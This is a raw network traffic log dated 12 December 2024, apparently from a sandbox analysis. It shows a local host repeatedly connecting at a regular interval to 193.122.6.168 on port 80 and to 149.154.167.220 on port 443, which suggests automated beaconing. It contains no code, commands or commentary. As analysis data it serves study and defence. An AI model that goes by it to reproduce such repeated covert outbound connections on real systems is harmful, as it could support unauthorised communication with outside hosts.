                                                                        Dec 12, 2024 21:40:46.445107937 CET8050029193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:47.604540110 CET8050029193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:47.611635923 CET5002980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:47.612618923 CET50033443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:47.612673044 CET44350033149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:47.612842083 CET50033443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:47.613207102 CET50033443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:47.613224030 CET44350033149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:47.731806993 CET8050029193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:47.731904030 CET5002980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:48.983707905 CET44350033149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:48.983856916 CET50033443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:48.985389948 CET50033443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:48.985413074 CET44350033149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:48.985733986 CET44350033149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:48.987618923 CET50033443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:48.987674952 CET44350033149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:48.987845898 CET44350033149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:48.987855911 CET50033443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:48.987889051 CET50033443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:49.094610929 CET5003680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:49.214350939 CET8050036193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:49.214436054 CET5003680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:49.214653015 CET5003680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:49.334665060 CET8050036193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:50.482580900 CET8050036193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:50.490677118 CET5003680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:50.491580963 CET50042443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:50.491630077 CET44350042149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:50.491753101 CET50042443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:50.492414951 CET50042443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:50.492436886 CET44350042149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:50.612216949 CET8050036193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:50.614310026 CET5003680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:51.855803013 CET44350042149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:51.855916977 CET50042443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:51.857491016 CET50042443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:51.857505083 CET44350042149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:51.857872009 CET44350042149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:51.859795094 CET50042443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:51.859843969 CET44350042149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:51.859920025 CET50042443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:52.037462950 CET5004580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:52.157936096 CET8050045193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:52.158032894 CET5004580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:52.158238888 CET5004580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:52.277981043 CET8050045193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:53.438178062 CET8050045193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:53.453845978 CET50046443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:53.453886986 CET44350046149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:53.453915119 CET5004580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:53.453969955 CET50046443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:53.454822063 CET50046443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:53.454835892 CET44350046149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:53.574007034 CET8050045193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:53.574101925 CET5004580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:54.878086090 CET44350046149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:54.878191948 CET50046443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:54.880249977 CET50046443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:54.880260944 CET44350046149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:54.880511045 CET44350046149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:54.882298946 CET50046443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:54.882338047 CET44350046149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:54.882472038 CET44350046149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:54.882530928 CET50046443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:54.882548094 CET50046443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:54.982141972 CET5004780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:55.101875067 CET8050047193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:55.102152109 CET5004780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:55.102468967 CET5004780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:55.223351002 CET8050047193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:56.431979895 CET8050047193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:56.443228006 CET50048443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:56.443279028 CET44350048149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:56.443418026 CET5004780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:56.443435907 CET50048443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:56.443880081 CET50048443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:56.443900108 CET44350048149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:56.563791990 CET8050047193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:56.564165115 CET5004780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:57.817610979 CET44350048149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:57.817693949 CET50048443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:57.819917917 CET50048443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:57.819926977 CET44350048149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:57.820162058 CET44350048149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:57.821969986 CET50048443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:57.822005033 CET44350048149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:57.822105885 CET50048443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:57.970535994 CET5004980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:58.090325117 CET8050049193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:58.090411901 CET5004980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:58.090575933 CET5004980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:58.210244894 CET8050049193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:59.371917009 CET8050049193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:59.379298925 CET50050443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:59.379358053 CET44350050149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:59.379421949 CET50050443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:59.379882097 CET50050443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:59.379897118 CET44350050149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:59.517913103 CET5004980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:00.742253065 CET44350050149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:00.742379904 CET50050443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:00.743885994 CET50050443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:00.743897915 CET44350050149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:00.744209051 CET44350050149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:00.746042013 CET50050443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:00.746103048 CET44350050149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:00.746310949 CET50050443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:00.746311903 CET44350050149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:00.746464968 CET50050443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:00.820815086 CET5004980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:00.822025061 CET5005180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:00.940825939 CET8050049193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:00.940936089 CET5004980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:00.941732883 CET8050051193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:00.941813946 CET5005180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:00.942018986 CET5005180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:01.061832905 CET8050051193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:02.212490082 CET8050051193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:02.228096008 CET50052443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:02.228154898 CET44350052149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:02.231339931 CET50052443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:02.233927965 CET50052443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:02.233951092 CET44350052149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:02.318919897 CET5005180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:03.610254049 CET44350052149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:03.610368013 CET50052443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:03.612201929 CET50052443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:03.612212896 CET44350052149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:03.612442017 CET44350052149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:03.614110947 CET50052443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:03.614139080 CET44350052149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:03.614200115 CET50052443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:03.756690025 CET5005380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:03.876827002 CET8050053193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:03.876907110 CET5005380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:03.877058983 CET5005380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:03.996723890 CET8050053193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:05.167371035 CET8050053193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:05.176582098 CET5005380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:05.177900076 CET50054443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:05.177937984 CET44350054149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:05.178015947 CET50054443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:05.178407907 CET50054443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:05.178419113 CET44350054149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:05.297622919 CET8050053193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:05.297707081 CET5005380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:06.567061901 CET44350054149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:06.567533016 CET50054443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:06.569102049 CET50054443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:06.569113016 CET44350054149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:06.569423914 CET44350054149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:06.571470976 CET50054443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:06.571532011 CET44350054149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:06.571712971 CET44350054149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:06.571780920 CET50054443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:06.572108030 CET50054443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:07.029670000 CET5005580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:07.149360895 CET8050055193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:07.149435997 CET5005580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:07.149638891 CET5005580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:07.269403934 CET8050055193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:08.416218996 CET8050055193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:08.421015024 CET5005180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:08.423938990 CET5005580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:08.424860954 CET50056443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:08.424892902 CET44350056149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:08.425065994 CET50056443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:08.425611019 CET50056443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:08.425622940 CET44350056149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:08.544760942 CET8050055193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:08.544935942 CET5005580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:09.836962938 CET44350056149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:09.837024927 CET50056443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:09.839159012 CET50056443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:09.839168072 CET44350056149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:09.839457035 CET44350056149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:09.841550112 CET50056443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:09.841612101 CET44350056149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:09.841660976 CET50056443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:09.946532011 CET5005780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:10.066273928 CET8050057193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:10.066427946 CET5005780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:10.066623926 CET5005780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:10.186564922 CET8050057193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:11.371253967 CET8050057193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:11.381747007 CET5005780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:11.382436037 CET50058443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:11.382476091 CET44350058149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:11.382548094 CET50058443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:11.383091927 CET50058443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:11.383100986 CET44350058149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:11.612834930 CET8050057193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:11.613042116 CET5005780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:12.924036026 CET44350058149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:12.924164057 CET50058443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:12.926058054 CET50058443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:12.926085949 CET44350058149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:12.926347971 CET44350058149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:12.928252935 CET50058443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:12.928319931 CET44350058149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:12.928390026 CET50058443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:13.014075994 CET5005980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:13.133956909 CET8050059193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:13.134040117 CET5005980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:13.134402990 CET5005980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:13.254230976 CET8050059193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:14.400928020 CET8050059193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:14.517973900 CET5005980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:14.864104033 CET50060443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:14.864132881 CET44350060149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:14.864240885 CET50060443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:14.865004063 CET50060443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:14.865019083 CET44350060149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:16.237855911 CET44350060149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:16.238915920 CET50060443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:16.239552021 CET50060443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:16.239559889 CET44350060149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:16.239778042 CET44350060149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:16.242929935 CET50060443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:16.242959976 CET44350060149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:16.243079901 CET44350060149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:16.243340969 CET50060443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:16.243472099 CET50060443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:16.367804050 CET5005980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:16.370548010 CET5006180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:16.488233089 CET8050059193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:16.488683939 CET5005980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:16.490309954 CET8050061193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:16.490513086 CET5006180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:16.490940094 CET5006180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:16.610850096 CET8050061193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:17.788548946 CET8050061193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:17.803536892 CET50062443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:17.803597927 CET44350062149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:17.803705931 CET50062443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:17.808466911 CET50062443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:17.808486938 CET44350062149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:18.017919064 CET5006180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:19.192662001 CET44350062149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:19.192739010 CET50062443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:19.195024967 CET50062443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:19.195033073 CET44350062149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:19.195272923 CET44350062149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:19.197844982 CET50062443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:19.197880030 CET44350062149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:19.197943926 CET50062443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:19.294689894 CET5006380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:19.414851904 CET8050063193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:19.415090084 CET5006380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:19.415219069 CET5006380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:19.535001040 CET8050063193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:20.524178028 CET5006180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:20.721466064 CET8050063193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:20.729233980 CET5006380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:20.729235888 CET50064443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:20.729279041 CET44350064149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:20.729881048 CET50064443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:20.729881048 CET50064443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:20.729921103 CET44350064149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:20.849666119 CET8050063193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:20.849838018 CET5006380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:22.104501963 CET44350064149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:22.104640007 CET50064443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:22.106575012 CET50064443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:22.106595039 CET44350064149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:22.106841087 CET44350064149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:22.109484911 CET50064443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:22.109533072 CET44350064149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:22.109592915 CET50064443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:22.216120005 CET5006580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:22.336807966 CET8050065193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:22.336899042 CET5006580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:22.337064028 CET5006580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:22.456960917 CET8050065193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:23.607122898 CET8050065193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:23.622790098 CET5006580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:23.675801039 CET50066443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:23.675860882 CET44350066149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:23.678989887 CET50066443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:23.679780960 CET50066443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:23.679797888 CET44350066149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:23.743115902 CET8050065193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:23.743191957 CET5006580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:25.047627926 CET44350066149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:25.047754049 CET50066443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:25.049365044 CET50066443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:25.049370050 CET44350066149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:25.049607992 CET44350066149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:25.051177979 CET50066443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:25.051218033 CET44350066149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:25.051309109 CET50066443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:25.294980049 CET5006780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:25.414764881 CET8050067193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:25.415095091 CET5006780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:25.418948889 CET5006780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:25.538650990 CET8050067193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:26.707092047 CET8050067193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:26.714164019 CET50068443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:26.714215040 CET44350068149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:26.714302063 CET50068443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:26.714587927 CET50068443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:26.714602947 CET44350068149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:26.814785957 CET5006780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:28.104020119 CET44350068149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:28.104187012 CET50068443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:28.108197927 CET50068443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:28.108215094 CET44350068149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:28.108480930 CET44350068149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:28.111129999 CET50068443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:28.111181974 CET44350068149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:28.111262083 CET50068443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:28.209490061 CET5006780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:28.211407900 CET5006980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:28.401319981 CET8050067193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:28.401345015 CET8050069193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:28.401546001 CET5006780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:28.401550055 CET5006980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:28.401623964 CET5006980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:28.521647930 CET8050069193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:29.672833920 CET8050069193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:29.680454016 CET5006980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:29.680897951 CET50070443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:29.680963039 CET44350070149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:29.681091070 CET50070443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:29.681433916 CET50070443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:29.681451082 CET44350070149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:29.800983906 CET8050069193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:29.801110983 CET5006980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:31.046941996 CET44350070149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:31.047069073 CET50070443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:31.048430920 CET50070443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:31.048451900 CET44350070149.154.167.220192.168.2.5
